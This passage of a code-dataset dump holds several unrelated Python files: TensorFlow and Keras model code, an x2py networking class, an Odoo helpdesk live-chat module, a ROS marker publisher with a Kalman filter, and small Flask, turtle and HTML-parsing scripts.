tf.name_scope(\"dropout\"):\r\n            self.h_drop = tf.nn.dropout(self.h_pool_flat, self.dropout_keep_prob)\r\n\r\n        # constructs variables for nce loss estimate; the weight matrix must match the\r\n        # dimensionality of the pooled feature vector that is fed in as `inputs` below\r\n        with tf.name_scope('weights'):\r\n            nce_weights = tf.Variable(\r\n                tf.truncated_normal([vocab_size, num_filters_total],\r\n                                    stddev=1.0 / math.sqrt(num_filters_total)))\r\n        with tf.name_scope('biases'):\r\n            nce_biases = tf.Variable(tf.zeros([vocab_size]))\r\n\r\n        # negative-sampling (NCE) loss over the pooled features\r\n        with tf.name_scope('loss'):\r\n            loss = tf.reduce_mean(\r\n                tf.nn.nce_loss(\r\n                    weights=nce_weights,\r\n                    biases=nce_biases,\r\n                    labels=self.labels,\r\n                    inputs=self.h_pool_flat,\r\n                    num_sampled=self.num_sampled,\r\n                    num_classes=vocab_size))\r\n\r\n    def train(self):\r\n        with tf.Graph().as_default():\r\n            session_conf = 
tf.ConfigProto(\r\n\r\n )\r\n\r\n","sub_path":"deep_netwokrs/text_CNN.py","file_name":"text_CNN.py","file_ext":"py","file_size_in_byte":4660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"181649835","text":"# Copyright (c) 2017, 2018 Jae-jun Kang\n# See the file LICENSE for details.\n\nfrom x2py.event_factory import EventFactory\nfrom x2py.hub import Hub\nfrom x2py.link import Link\nfrom x2py.util.ranged_int_pool import RangedIntPool\nfrom x2py.util.rwlock import ReadLock, WriteLock, ReadWriteLock\nfrom x2py.util.trace import Trace\n\nfrom x2py.links.link_events import *\n\ndef _static_init():\n EventFactory.register(LinkEventType.HANDSHAKE_REQ, HandshakeReq)\n EventFactory.register(LinkEventType.HANDSHAKE_RESP, HandshakeResp)\n EventFactory.register(LinkEventType.HANDSHAKE_ACK, HandshakeAck)\n\n return RangedIntPool(1, 65536, True)\n\nclass SessionBasedLink(Link):\n handle_pool = _static_init()\n\n def __init__(self, name):\n super(SessionBasedLink, self).__init__(name)\n self.rwlock = ReadWriteLock()\n self.channel_strategy = None\n self.heartbeat_strategy = None\n\n @property\n def has_channel_strategy(self):\n return (self.channel_strategy is not None)\n\n @property\n def has_heartbeat_strategy(self):\n return (self.heartbeat_strategy is not None)\n\n def init_session(self, session):\n if self.has_channel_strategy:\n self.channel_strategy.before_session_setup(session)\n if self.has_heartbeat_strategy:\n self.heartbeat_strategy.before_session_setup(session)\n\n if self.has_channel_strategy:\n self.channel_strategy.init_handshake(session)\n else:\n self.on_connect(True, session)\n\n\n def on_connect(self, result, context):\n Trace.info(\"{} connected {} {}\", self.name, result, context)\n\n if result:\n handle = SessionBasedLink.handle_pool.acquire()\n context.handle = handle\n\n self._on_connect(result, context)\n\n LinkSessionConnected().setattrs(\n link_name = self.name,\n result = result,\n context = context\n ).post()\n\n def on_disconnect(self, handle, context):\n Trace.info(\"{} disconnected {} {}\", self.name, handle, context)\n\n self._on_disconnect(handle, context)\n\n if handle != 0:\n SessionBasedLink.handle_pool.release(handle)\n\n LinkSessionDisconnected().setattrs(\n link_name = self.name,\n handle = handle,\n context = context\n ).post()\n\n def _on_connect(self, result, context):\n pass\n\n def _on_disconnect(self, handle, context):\n pass\n\n def _setup(self):\n super(SessionBasedLink, self)._setup()\n\n self.bind(LinkSessionConnected().setattrs(link_name = self.name),\n self.on_link_session_connected)\n self.bind(LinkSessionDisconnected().setattrs(link_name = self.name),\n self.on_link_session_disconnected)\n\n if self.has_channel_strategy:\n self.channel_strategy.link = self\n self.channel_strategy.setup()\n\n if self.has_heartbeat_strategy:\n self.heartbeat_strategy.link = self\n self.heartbeat_strategy.setup()\n\n self.bind(Hub.heartbeat_event, self.on_heartbeat_event)\n\n def _teardown(self):\n if self.has_heartbeat_strategy:\n self.heartbeat_strategy.teardown()\n self.heartbeat_strategy = None\n if self.has_channel_strategy:\n self.channel_strategy.teardown()\n self.channel_strategy = None\n\n self.unbind(LinkSessionConnected().setattrs(link_name = self.name),\n self.on_link_session_connected)\n self.unbind(LinkSessionDisconnected().setattrs(link_name = self.name),\n self.on_link_session_disconnected)\n\n super(SessionBasedLink, self)._teardown()\n\n def on_link_session_connected(self, event):\n 
self.on_session_connected(event.result, event.context)\n\n def on_link_session_disconnected(self, event):\n self.on_session_disconnected(event.handle, event.context)\n\n def on_session_connected(self, result, context):\n pass\n\n def on_session_disconnected(slef, handle, context):\n pass\n\n def on_heartbeat_event(self, event):\n self.heartbeat_strategy.on_heartbeat()\n","sub_path":"x2py/links/session_based_link.py","file_name":"session_based_link.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"144011725","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nimport re\nfrom odoo import api, fields, models, _\n\n\nclass HelpdeskTeam(models.Model):\n _inherit = ['helpdesk.team']\n\n feature_livechat_channel_id = fields.Many2one('im_livechat.channel', string='Live Chat Channel', compute='_get_livechat_channel', store=True)\n feature_livechat_web_page = fields.Char(related='feature_livechat_channel_id.web_page', string='Live Chat Test Page', readonly=True)\n is_canned_response = fields.Boolean()\n\n @api.depends('use_website_helpdesk_livechat')\n def _get_livechat_channel(self):\n LiveChat = self.env['im_livechat.channel']\n for team in self:\n if not team.feature_livechat_channel_id and team.name and team.use_website_helpdesk_livechat:\n channel = LiveChat.search([('name', '=', team.name)])\n if not channel:\n if team.member_ids:\n channel = LiveChat.create({'name': team.name, 'user_ids': [(6, _, team.member_ids.ids)]})\n else:\n channel = LiveChat.create({'name': team.name})\n team.feature_livechat_channel_id = channel\n\n\nclass MailChannel(models.Model):\n _inherit = 'mail.channel'\n\n # ------------------------------------------------------\n # Commands\n # ------------------------------------------------------\n\n def _define_command_helpdesk(self):\n return {'help': _(\"Create a new helpdesk ticket\")}\n\n def _execute_command_helpdesk(self, **kwargs):\n key = kwargs.get('body').split()\n partner = self.env.user.partner_id\n msg = _('Something is missing or wrong in command')\n channel_partners = self.env['mail.channel.partner'].search([('partner_id', '!=', partner.id), ('channel_id', '=', self.id)], limit=1)\n if key[0].lower() == '/helpdesk':\n if len(key) == 1:\n if self.channel_type == 'channel':\n msg = _(\"You are in channel #%s.\") % self.name\n if self.public == 'private':\n msg += _(\" This channel is private. People must be invited to join it.\")\n else:\n msg = _(\"You are in a private conversation with @%s.\") % channel_partners.partner_id.name\n msg += _(\"\"\"
<br/><br/>\n                    You can create a new ticket by typing /helpdesk \"ticket title\".<br/>\n                    You can search for tickets by typing /helpdesk_search \"Keywords1 Keywords2 etc\"<br/>\n                    \"\"\")\n            else:\n                list_value = key[1:]\n                description = ''\n                for message in self.channel_message_ids.sorted(key=lambda r: r.id):\n                    name = message.author_id.name or 'Anonymous'\n                    description += '%s: ' % name + '%s\\n' % re.sub('<[^>]*>', '', message.body)\n                team = self.env['helpdesk.team'].search([('member_ids', 'in', self._uid)], order='sequence', limit=1)\n                team_id = team.id if team else False\n                helpdesk_ticket = self.env['helpdesk.ticket'].create({\n                    'name': ' '.join(list_value),\n                    'user_id': self.env.user.id,\n                    'description': description,\n                    'partner_id': channel_partners.partner_id.id,\n                    'team_id': team_id,\n                })\n                link_ticket = '<a href=\"#\">'+helpdesk_ticket.name+'</a>'\n                msg = _(\"Created a new ticket and request: %s\") % link_ticket\n        return self._send_transient_message(partner, msg)\n\n    def _define_command_helpdesk_search(self):\n        return {'help': _(\"Search for a helpdesk ticket\")}\n\n    def _execute_command_helpdesk_search(self, **kwargs):\n        key = kwargs.get('body').split()\n        partner = self.env.user.partner_id\n        msg = _('Something is missing or wrong in command')\n        if key[0].lower() == '/helpdesk_search':\n            if len(key) == 1:\n                msg = _('You can search for tickets by typing /helpdesk_search \"Keywords1 Keywords2 etc\"<br/>')\n            else:\n                list_value = key[1:]\n                Keywords = re.findall('\\\\w+', ' '.join(list_value))\n                HelpdeskTag = self.env['helpdesk.tag']\n                for Keyword in Keywords:\n                    HelpdeskTag |= HelpdeskTag.search([('name', 'ilike', Keyword)])\n                tickets = self.env['helpdesk.ticket'].search([('tag_ids', 'in', HelpdeskTag.ids)], limit=10)\n                if not tickets:\n                    for Keyword in Keywords:\n                        tickets |= self.env['helpdesk.ticket'].search([('name', 'ilike', Keyword)], order=\"id desc\", limit=10)\n                        if len(tickets) > 10:\n                            break\n                if tickets:\n                    link_tickets = ['<br/><a href=\"#\">#'+ticket.name+'</a>' for ticket in tickets]\n                    msg = _('We found some matched ticket(s) related to the search query: %s') % ''.join(link_tickets)\n                else:\n                    msg = _('No tickets found related to the search query.<br/>
make sure to use the right format: (/helpdesk_search Keyword1 Keyword2 etc...)')\n return self._send_transient_message(partner, msg)\n","sub_path":"website_helpdesk_livechat/models/helpdesk.py","file_name":"helpdesk.py","file_ext":"py","file_size_in_byte":5488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"420504461","text":"import itertools\nimport os\nimport shutil\nimport subprocess\n\ncells = ['tguv2']\n\n# lengths = ['100', '200', '500']\nlengths = ['100']\nnums = ['1', '2', '3']\n# lrates = ['0.01', '0.001', '0.0001']\nlrates = ['0.01', '0.1']\n\ngrid_iter = itertools.product(cells, lengths, nums, lrates)\n\nfor cell, length, num_items, lr in grid_iter:\n for i in range(5):\n results_dir = os.path.join(\n '../2017/variable_binding/longruns/noisy/tanh',\n '{}x{}'.format(length, num_items),\n cell,\n lr,\n '{}'.format(i))\n os.makedirs(results_dir)\n width = int(num_items)*10\n args = ['python',\n 'vbind.py',\n '--width={}'.format(width),\n '--rank={}'.format(width),\n '--task=continuous',\n '--inbetween_noise=True',\n '--batch_size=50',\n '--num_steps=25000',\n '--learning_rate={}'.format(lr),\n '--cell={}'.format(cell),\n '--sequence_length={}'.format(length),\n '--num_items={}'.format(num_items),\n '--results_dir={}'.format(results_dir)]\n subprocess.run(args, check=True)\n","sub_path":"vbind_runner.py","file_name":"vbind_runner.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"162275031","text":"#!/usr/bin/env python\n\nimport rospy\nimport cv2\nimport numpy as np\n# from std_msgs.msg import String, Int16, Header\nfrom obj_detector.srv import items, itemsResponse\nfrom geometry_msgs.msg import Point, Quaternion, PoseStamped, Pose\nfrom sensor_msgs.msg import CompressedImage, PointCloud2\nfrom nav_msgs.msg import Odometry\nimport sensor_msgs.point_cloud2 as pc2\nfrom obj_detector.msg import Detection_msg\nfrom ar_track_alvar_msgs.msg import AlvarMarkers, AlvarMarker\nimport tf2_ros\nimport tf2_geometry_msgs\nimport copy\nimport string\n\n# --------------------------description---------------------- /\n# This script is a serviec that gets names of items, then if it detect\n# one of them its publish PoseStamped and image with the dot in the item center.\n# The PoseStamped are publish at 2 different topic according to the detect object.\n# One topic for pick (cup, bottle) second topic for cup deliver to person.\n# For intput '' the servie stop, for input like 'cup,bottle' the service publish\n# alvar marker of cup or bottle in the pick up matker topic.\n# Additionaly this script include KLF that estimate the object location\n\n\npointcloud_topic = '/kinect2/qhd/points'\ncamera_topic = '/kinect2/qhd/image_color_rect/compressed'\ndetect_topic = '/yolo4_result/detections'\npick_markers_publish_topic = '/detected_objects'\nperson_markers_publish_topic = \"/detected_objects_person\"\nimg_publish_topic = '/yolo4_result/obj_pick/compressed'\n\n\nclass pointcloud():\n def __init__(self):\n # self.data = PointCloud2()\n rospy.Subscriber(pointcloud_topic, PointCloud2, self.listener)\n\n def listener(self, msg):\n self.data = msg\n\n\nclass KLF_alvarMarker():\n def __init__(self):\n self.odom = rospy.wait_for_message('/mobile_base_controller/odom', Odometry).twist.twist\n rospy.Subscriber('/mobile_base_controller/odom', Odometry, self.odom_cb, queue_size=1)\n self.dt = 0.01\n rospy.Timer(rospy.Duration(self.dt), self.predict)\n self.x = 0.\n 
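# NOTE (editor): a 2-state Kalman filter over the marker's (x, y) in the base_footprint frame. predict() propagates the state with an odometry-derived transition F and inflates the covariance (P <- F P F^T + Q); update() applies the standard correction with H = I:\n        #   K = P (P + R)^-1\n        #   x <- x + K (z - x)\n        #   P <- (I - K) P (I - K)^T + K R K^T   (Joseph form; note the plain (I - K) P assignment just before it feeds into this, so (I - K) is effectively applied twice, which looks unintended)\n        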
self.y = 0.\n        self.x_dot = 0\n        self.y_dot = 0\n        self.x_vec = np.array([[self.x], [self.y]], dtype=np.float32)  # , self.x_dot, self.y_dot)\n        self.p = np.zeros((2, 2))\n        self.q = np.eye(2)*0.1\n        self.r = np.eye(2)*0.01\n\n    def odom_cb(self, msg):\n        self.odom = msg.twist.twist\n\n    def predict(self, event):\n        temp = self.x_vec[0] if self.x_vec[0] != 0 else 10e5\n        F = np.array([[1-self.dt*self.odom.linear.x/temp, 0],\n                      [-self.dt*self.odom.angular.z, 1]], dtype=np.float32)\n\n        self.x_vec = np.matmul(F, self.x_vec)  # Predicted state estimate\n        self.p = np.linalg.multi_dot([F, self.p, F.T]) + self.q  # Predicted estimate covariance\n        # print(self.x_vec)\n\n    def update(self, observe):\n        observe_vec = np.array([[observe.pose.position.x], [observe.pose.position.y]])\n        y_vec = observe_vec - self.x_vec\n        s = self.p + self.r\n        k = self.p.dot(np.linalg.inv(s))\n        self.x_vec = self.x_vec + k.dot(y_vec)\n        # Joseph form covariance update\n        self.p = np.linalg.multi_dot([(np.eye(2)-k), self.p, (np.eye(2)-k).T]) + np.linalg.multi_dot([k, self.r, k.T])\n\n\nclass Alvar_markers():\n    def __init__(self, publisher):\n        self.data = AlvarMarkers()\n        self.data.markers = [AlvarMarker(), AlvarMarker()]\n        self.pub = publisher\n        self.data.markers[0].id = 1\n\n        self.data.markers[1].id = 2\n        self.data.header.frame_id = 'base_footprint'\n        self.last_update = rospy.Time.now()\n        self._timer = rospy.Timer(rospy.Duration(0.2), self.publish)\n\n    def update(self, pose_transformed, score):\n        self.data.header.stamp = rospy.Time.now()\n        self.last_update = rospy.Time.now()\n        self.data.markers[0].pose = pose_transformed\n        self.data.markers[0].header.stamp = rospy.Time.now()\n        self.data.markers[0].header.frame_id = self.data.header.frame_id\n        self.data.markers[0].confidence = score\n        self.data.markers[0].pose.pose.position.z += 0.0\n        self.data.markers[0].pose.pose.orientation = Quaternion(0, 0, 0, 1)\n\n        self.data.markers[1].pose = copy.deepcopy(pose_transformed)\n        self.data.markers[1].header.stamp = rospy.Time.now()\n        self.data.markers[1].header.frame_id = self.data.header.frame_id\n        self.data.markers[1].confidence = score\n        self.data.markers[1].pose.pose.position.z -= 0.08\n        self.data.markers[1].pose.pose.orientation = Quaternion(0, 0, 0, 1)\n\n    def predict(self):\n        global estimator, pub_img, kinect2_img\n        predict_pose = PoseStamped()\n        predict_pose.pose.position.x = estimator.x_vec[0]\n        predict_pose.pose.position.y = estimator.x_vec[1]\n        predict_pose.header.frame_id = 'base_footprint'\n        predict_pose.pose.position.z = self.data.markers[0].pose.pose.position.z\n        self.update(predict_pose, 0.1)\n        compress_image = createCompresseImage(kinect2_img)\n        pub_img.publish(compress_image)\n\n    def publish(self, event):\n        if (rospy.Time.now() - self.last_update).to_sec() > 0.5:\n            self.predict()\n        self.pub.publish(self.data)\n\n\ndef img_listner(msg):\n    global kinect2_img\n    img_cv2 = np.fromstring(msg.data, np.uint8)\n    kinect2_img = cv2.imdecode(img_cv2, cv2.IMREAD_COLOR)\n\n\ndef createCompresseImage(cv2_img):\n    msg = CompressedImage()\n    msg.header.stamp = rospy.Time.now()\n    msg.format = \"jpeg\"\n    msg.data = np.array(cv2.imencode('.jpg', cv2_img)[1]).tostring()\n    return msg\n\n\ndef publish_image(stamp_pose, detection):\n    global kinect2_img, pub_img\n    frame = kinect2_img\n    [x, y] = [int(detection.pose.x_center), int(detection.pose.y_center)]\n    cv2.circle(frame, (x, y), radius=3, color=(0, 0, 255), thickness=-5)\n    cv2.putText(frame, detection.class_id, (x+10, y), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)\n    compress_image = 
createCompresseImage(frame)\n    pub_img.publish(compress_image)\n\n\ndef list_2_stampPose(location):\n    pose = Point(location[0], location[1], location[2])\n    input_pose = PoseStamped()\n    input_pose.pose.position = pose\n    input_pose.pose.orientation.w = 1\n    input_pose.header.stamp = rospy.Time.now()\n    input_pose.header.frame_id = 'kinect2_depth_optical_frame'\n    return input_pose\n\n\ndef detection_cb(msg, items_list, point_cloud_data):\n    global kinect2_img, tf_buffer, estimator\n    if not items_list:\n        pass\n    elif msg.class_id in items_list:\n        [u, v] = [int(msg.pose.x_center), int(msg.pose.y_center)]\n        # location type --> [(tuple)]\n        location_xyz = list(pc2.read_points(point_cloud_data.data, ('x', 'y', 'z'), skip_nans=True, uvs=[[u, v]]))\n        if location_xyz:\n            converted_location = list_2_stampPose(location_xyz[0])\n            transform = tf_buffer.lookup_transform('base_footprint',\n                                                   converted_location.header.frame_id,  # source frame\n                                                   rospy.Time(0),  # get the tf at first available time\n                                                   rospy.Duration(1.0))  # wait for 1 second\n            pose_transformed = tf2_geometry_msgs.do_transform_pose(converted_location,\n                                                                   transform)\n            alvar_marker.update(pose_transformed, msg.score)\n            estimator.update(pose_transformed)\n            publish_image(converted_location, msg)\n\n\ndef item_cb(msg):\n    global items_list, alvar_marker, estimator\n    msg.items = ''.join(filter(lambda c: c in string.printable, msg.items))\n    items_list = msg.items.split(\",\")\n    if '' in items_list:\n        # alvar_marker.pub.unregister()\n        if alvar_marker:\n            alvar_marker._timer.shutdown()\n            del alvar_marker\n            del estimator\n            alvar_marker = False\n            estimator = False\n        return itemsResponse(False)\n    estimator = KLF_alvarMarker()\n    if 'person' in items_list:\n        alvar_marker = Alvar_markers(person_pub_markers)\n    else:\n        alvar_marker = Alvar_markers(pick_pub_markers)\n    return itemsResponse(True)\n\n\ndef main():\n    point_cloud_data = pointcloud()\n    global tf_buffer, tf_listener, pub_img, pick_pub_markers, person_pub_markers, estimator, items_list, alvar_marker\n    items_list = []\n    alvar_marker = False\n    estimator = False\n    rospy.Service('alvar_marker_service', items, item_cb)\n    pick_pub_markers = rospy.Publisher(pick_markers_publish_topic, AlvarMarkers,\n                                       queue_size=10)\n    person_pub_markers = rospy.Publisher(person_markers_publish_topic, AlvarMarkers,\n                                         queue_size=10)\n    pub_img = rospy.Publisher(img_publish_topic, CompressedImage, queue_size=1)\n    # pose_pub = rospy.Publisher('/find_objects_node/object_pose', PoseStamped, queue_size= 1)\n\n    tf_buffer = tf2_ros.Buffer()\n    tf_listener = tf2_ros.TransformListener(tf_buffer)\n\n    rospy.Subscriber(camera_topic, CompressedImage, img_listner, queue_size=1)\n    rospy.wait_for_message(camera_topic, CompressedImage)\n    detection_cb_lambda = lambda data: detection_cb(data, items_list, point_cloud_data)\n\n    rospy.Subscriber(detect_topic, Detection_msg, detection_cb_lambda, queue_size=15)\n    rospy.wait_for_message(detect_topic, Detection_msg)\n\n    rospy.spin()\n\n\nif __name__ == '__main__':\n    rospy.init_node('alvar_marker_pub', anonymous=True)\n    main()\n","sub_path":"scripts/alvar_markers_pub.py","file_name":"alvar_markers_pub.py","file_ext":"py","file_size_in_byte":9490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
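The KLF_alvarMarker record above is a two-state Kalman filter: predict() warps the object estimate by the robot's own odometry, and update() fuses a fresh detection with gain K = P(P+R)^-1. A minimal self-contained sketch of the same predict/update cycle (constants are illustrative, mirroring the q/r values above; an identity transition stands in for the odometry-derived F):

import numpy as np

x = np.zeros((2, 1))             # state: object position [x, y] in the robot frame
P = np.zeros((2, 2))             # state covariance
Q = np.eye(2) * 0.1              # process noise
R = np.eye(2) * 0.01             # measurement noise

def predict(F=np.eye(2)):
    global x, P
    x = F.dot(x)                 # propagate the state estimate
    P = F.dot(P).dot(F.T) + Q    # propagate the covariance

def update(z):
    global x, P
    y = z - x                    # innovation (measurement matrix H is identity here)
    S = P + R                    # innovation covariance
    K = P.dot(np.linalg.inv(S))  # Kalman gain
    x = x + K.dot(y)
    I_K = np.eye(2) - K
    P = I_K.dot(P).dot(I_K.T) + K.dot(R).dot(K.T)  # Joseph form, numerically safer

predict()
update(np.array([[1.0], [0.5]]))  # fuse a detection at (1.0, 0.5)
print(x.ravel())                  # estimate moves most of the way toward the measurement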
+{"seq_id":"321132181","text":"# -*- coding: utf-8 -*-\nimport sys\n\n\ndef get_ordinal_list(limit):\n    if not isinstance(limit, int):\n        raise ValueError('Limit argument must be an integer')\n\n    if limit not in range(1, 11):\n        raise ValueError('Limit argument must be in range from 1 to 10')\n\n    ordinals = []\n    ordinals += ['first', 'second', 'third', 'fourth', 'fifth']\n    ordinals += ['sixth', 'seventh', 'eighth', 'ninth', 'tenth']\n\n    return ordinals[0:limit]\n\n\ndef phrase_save(attempts=1):\n    max_attempts_count = 10\n\n    if not isinstance(attempts, int):\n        raise ValueError('Attempts argument must be an integer')\n\n    if attempts not in range(1, max_attempts_count + 1):\n        raise ValueError('Attempts argument must be in range from 1 to 10')\n\n    ordinal_phrase_prefixes = get_ordinal_list(max_attempts_count)\n\n    f = open('../out/phrase_save.txt', 'a')\n\n    attempt_counter = 0\n\n    while attempt_counter < attempts:\n        try:\n            phrase = input('Input phrase: ')\n        except KeyboardInterrupt:\n            break\n\n        if phrase == '':\n            break\n\n        write_str = '{} phrase: {}'.format(ordinal_phrase_prefixes[attempt_counter].capitalize(), phrase[::-1])\n        print(write_str, file=f)\n\n        attempt_counter += 1\n\n    print('\\nThank you...')\n\n    f.close()\n\n\ndef main():\n    if len(sys.argv) > 1:\n        try:\n            attempts = int(sys.argv[1])\n        except ValueError:\n            attempts = 3\n        finally:\n            phrase_save(attempts)\n    else:\n        phrase_save()\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"lesson7/save_phrase.py","file_name":"save_phrase.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"82192101","text":"import re\nimport logging\n\nfrom collections import defaultdict\n\nfrom flask import render_template\n\nlogger = logging.getLogger(\"quoted-forsooth.utils\")\n\ndef natural_key(string_):\n    \"\"\"See http://www.codinghorror.com/blog/archives/001018.html\"\"\"\n    return [int(s) if s.isdigit() else s for s in re.split(r'(\\d+)', str(string_))]\n\ndef collect_metadata(text, just_the_facts=False, include_div=False):\n    if text is None:\n        if just_the_facts:\n            return {}\n        else:\n            return None\n    metadict = defaultdict(list)\n    def _collect_metadata(match):\n        submatch = re.fullmatch(r\"<<(?P<key>.+?): (?P<value>.+?)>>\", match.group(0))\n        try:\n            metadict[submatch.group('key')].append(submatch.group('value'))\n            return ''\n        except Exception:\n            return match.group(0)\n\n    r = r\"<<.+?: .+?>>\"\n    new_text = re.sub(r, _collect_metadata, text)\n    if just_the_facts:\n        return metadict\n    if include_div:\n        div = render_template('userMetadata.div.html', metadata=metadict)\n        new_text = div + new_text\n    return new_text\n\ndef printable(text):\n    if not text:\n        return ''\n    parsers = [\n        collect_metadata,\n    ]\n    for p in parsers:\n        text = p(text)\n    return text\n\ndef toggle_checkbox(text, number, item_text):\n    new_lines = []\n    start_regex = re.compile(r\"```(?:CHECKLIST|checklist)(?: (.+))?$\")\n    end_regex = re.compile(r\"```$\")\n    cl_regex = re.compile(r\"(-|X) (.+)$\")\n    checklist_mode = False\n    checkboxes = 0\n    for line in text.splitlines():\n        if not checklist_mode:\n            start_match = start_regex.fullmatch(line)\n            if start_match:\n                checklist_mode = True\n                new_lines.append(line)\n                continue\n            else:\n                new_lines.append(line)\n                continue\n        else:\n            end_match = end_regex.fullmatch(line)\n            if end_match:\n                new_lines.append(line)\n                checklist_mode = False\n                continue\n            else:\n                # this should be a checklist item\n                cl_match = cl_regex.fullmatch(line)\n                if cl_match:\n                    checkboxes = checkboxes + 1\n                    item = cl_match.group(2)\n                    if checkboxes == number and item_text == item:\n                        # This is reversing the checked state!\n                        checked = '-' if (cl_match.group(1) == \"X\") else 'X'\n                        new_text = checked + line[1:]\n                        new_lines.append(new_text)\n                    else:\n                        
new_lines.append(line)\n else:\n new_lines.append(line)\n return '\\n'.join(new_lines)\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"491150387","text":"from turtle import Turtle\n\nFONT = (\"Courier\", 18, \"normal\")\nGO_FONT = (\"Courier\", 30, \"normal\")\n\n\nclass ScoreBoard(Turtle):\n def __init__(self):\n super().__init__()\n self.score = 0\n self.lives = 3\n self.color(\"white\")\n self.hideturtle()\n self.penup()\n\n def update_score(self):\n self.goto(300,-250)\n self.write(f\"Score: {self.score}\", align=\"left\", font=FONT)\n\n def update_lives(self):\n self.goto(300,-220)\n self.write(f\"Lives: {self.lives}\", align=\"left\", font=FONT)\n\n def increase_score(self):\n self.clear()\n self.score += 1\n self.goto(300,-250)\n self.write(f\"Score: {self.score}\", align=\"left\", font=FONT)\n\n def decrease_lives(self):\n self.clear()\n self.lives -= 1\n self.goto(300,-220)\n self.write(f\"Lives: {self.lives}\", align=\"left\", font=FONT)\n\n def game_over(self):\n self.goto(0,0)\n self.write(\"GAME OVER\", align=\"center\", font=GO_FONT)\n","sub_path":"scores.py","file_name":"scores.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"648873369","text":"# -*- coding: utf-8 -*-\nimport logging\nimport pickle\nfrom pathlib import Path\n\nimport numpy as np\nfrom sklearn.model_selection import KFold\nimport keras.backend as K\nfrom keras.layers import Input, Embedding, Dense, SpatialDropout1D, LSTM\nfrom keras.layers import RepeatVector, TimeDistributed\nimport keras.layers as L\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\n\nfrom pipeline.utility import unpack_data_dict\n\ndef build_autoencoder(verbose=False, compile=True):\n \"\"\" Build VAE model.\"\"\"\n\n MAXLEN = 220 # Is it worth directly inferring this from the training data? 
Probably.\n    path = project_dir + '/data/processed/word_index.pkl'\n    with open(path, 'rb') as f:\n        word_index = pickle.load(f)\n    print(f\"Word index length: {len(word_index)}\")\n    path = project_dir + '/data/processed/embedding_matrix.pkl'\n    with open(path, 'rb') as f:\n        embedding_matrix = pickle.load(f)\n    print(f\"Embedding matrix shape: {embedding_matrix.shape}\")\n\n    inputs = Input(shape=(MAXLEN,), dtype='int32')\n    embedding_layer = Embedding(input_dim=len(word_index),\n                            output_dim=300,\n                            weights=[embedding_matrix],\n                            input_length=MAXLEN,\n                            trainable=False)\n\n    embedded_text = embedding_layer(inputs)\n    #embedded_text = Embedding(,128\n    x = LSTM(300)(embedded_text)\n    #x = SpatialDropout1D(0.2)(x)\n    encoded = RepeatVector(100)(x)\n    decoded = LSTM(300, return_sequences=True)(encoded)\n    outputs = TimeDistributed(Dense(len(word_index), activation='softmax'))(decoded)\n    #x = Dense( , activation='relu')(x)\n\n    model = Model(inputs, outputs)\n    if verbose:\n        model.summary()\n    if compile:\n        model.compile(loss='categorical_crossentropy', \n                    optimizer=Adam(0.005),\n                    metrics=[])\n    return model\n\ndef train_model(model, data):\n    \"\"\" \"\"\"\n    n_splits = 5\n    BATCH_SIZE = 512\n    NUM_EPOCHS = 3\n\n    X_train, y_train, X_test, y_test = unpack_data_dict(data)\n\n    splits = list(KFold(n_splits=n_splits).split(X_train, y_train))\n\n    oof_preds = np.zeros((X_train.shape[0]))\n    test_preds = np.zeros((X_test.shape[0]))\n    #TODO modify all of this as appropriate for seq2seq_autoencoder \n    for fold in range(n_splits):\n        K.clear_session()\n        train_index, val_index = splits[fold]\n        checkpoint = ModelCheckpoint(f\"seq2seq_ae_{fold}.hdf5\", \n                                     save_best_only=True)\n        early_stopping = EarlyStopping(monitor='val_loss',\n                                       mode='min',\n                                       verbose=1,\n                                       patience=3)\n        model.fit(X_train[train_index],\n                  y_train[train_index]>0.5,\n                  batch_size=BATCH_SIZE,\n                  epochs=NUM_EPOCHS,\n                  validation_data=(X_train[val_index], y_train[val_index]>0.5),\n                  callbacks=[early_stopping, checkpoint])\n        oof_preds[val_index] += model.predict(X_train[val_index])[:,0]\n        test_preds += model.predict(X_test)[:,0]\n    test_preds /= n_splits\n\n\ndef main(project_dir):\n    \"\"\" \n    \"\"\"\n    logger = logging.getLogger(__name__)\n\n    path = project_dir + '/data/processed/data_tokenize.pkl'\n    logging.info(f\"Loading tokenized data from {path}\")\n    with open(path, 'rb') as f:\n        data = pickle.load(f) \n    autoencoder = build_autoencoder(verbose=True)\n    train_model(autoencoder, data)\n\n\nif __name__ == '__main__':\n    log_fmt = '%(asctime)s-%(levelname)s: %(message)s'\n    date_fmt = '%Y%m%d %H:%M:%S'\n    logging.basicConfig(level=logging.INFO, format=log_fmt, datefmt=date_fmt)\n\n    project_dir = str(Path(__file__).resolve().parents[2])\n\n    main(project_dir)\n","sub_path":"src/models/seq2seq_autoencoder.py","file_name":"seq2seq_autoencoder.py","file_ext":"py","file_size_in_byte":3877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"42354955","text":"# https://www.hackerrank.com/challenges/detect-html-tags-attributes-and-attribute-values/problem\n\nfrom html.parser import HTMLParser\n\nclass MyHTMLParser(HTMLParser):\n    def handle_starttag(self, tag, attrs):\n        print(tag)\n        if attrs:\n            self.print_attrs(attrs)\n    def handle_endtag(self, tag):\n        pass\n    def handle_startendtag(self, tag, attrs):\n        print(tag)\n        if attrs:\n            self.print_attrs(attrs)\n    def print_attrs(self, attrs):\n        if not attrs:\n            